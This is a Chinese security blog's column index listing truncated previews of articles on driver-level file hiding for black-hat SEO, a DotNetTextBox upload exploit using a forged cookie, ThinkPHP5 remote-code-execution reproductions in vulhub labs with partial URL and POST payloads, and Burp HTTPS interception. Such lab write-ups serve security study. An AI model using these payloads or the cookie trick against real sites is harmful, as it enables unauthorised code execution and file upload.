
网安
shadow_pedestrian
热爱编程,可惜不聪明
展开
专栏收录文章
- 默认排序
- 最新发布
- 最早发布
- 最多阅读
- 最少阅读
-
驱动文件隐藏
1、服务器使用文件查找hark.asp 未查找到文件。2、检测了第三方js未发现hark.asp。3、检查了CSS等,未发现跳转代码。4、使用阿D及安全狗,未发现shell,安全狗发现挂马,但是是误报的。驱动级的文件隐藏来实现黑帽SEO的,有如下特征:系统目录存在如下文件:c:\WINDOWS\xlkfs.datc:\WINDOWS\xlkfs.dllc:\WINDOWS\xlkfs.inic:\...转载 2018-06-25 00:26:57 · 2133 阅读 · 0 评论 -
DotNetTextBox编辑器漏洞利用
关键字:system_dntb/确定有 system_dntb/uploadimg.aspx 并能打开,这时候是不能上传的,由于他是验证cookie来得出上传后的路径,这样我们可以用cookie欺骗工具。cookie:UserType=0; IsEdition=0; Info=1; uploadFolder=../system_dntb/Upload/;路径可以修改,只是权限够,上传后改名为1.a...转载 2018-06-25 22:25:14 · 912 阅读 · 0 评论 -
thinkphp5.0.23 远程代码执行复现
漏洞影响版本5.0.23之前的版本 我使用的是vulhub下提供的漏洞环境,如何使用自行百度谷歌。 装好后打开网站如下 使用如下poc,即可实现远程代码执行 POST /index.php?s=captcha HTTP/1.1 Host: 你的id User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:56.0) Ge...原创 2019-02-08 23:37:02 · 7208 阅读 · 1 评论 -
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞复现
复现环境 thinkphp5.0.22 推荐使用vulhub快速搭建漏洞环境 漏洞payload: 1:/index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=100 2:index.php?s=index/think\app/invokefunction&function=cal...原创 2019-02-09 00:06:02 · 3733 阅读 · 0 评论 -
windows 加 switchyomega + burp 抓https包
很简单,下载证书后导入到受信任根目录 证书下载,直接在代理状态浏览器访问burp 点击CA就可以下载了 设置该证书全部信任,, switchyomega 设置如下即可 就可以抓https的包了 ...原创 2019-02-23 20:26:08 · 5119 阅读 · 1 评论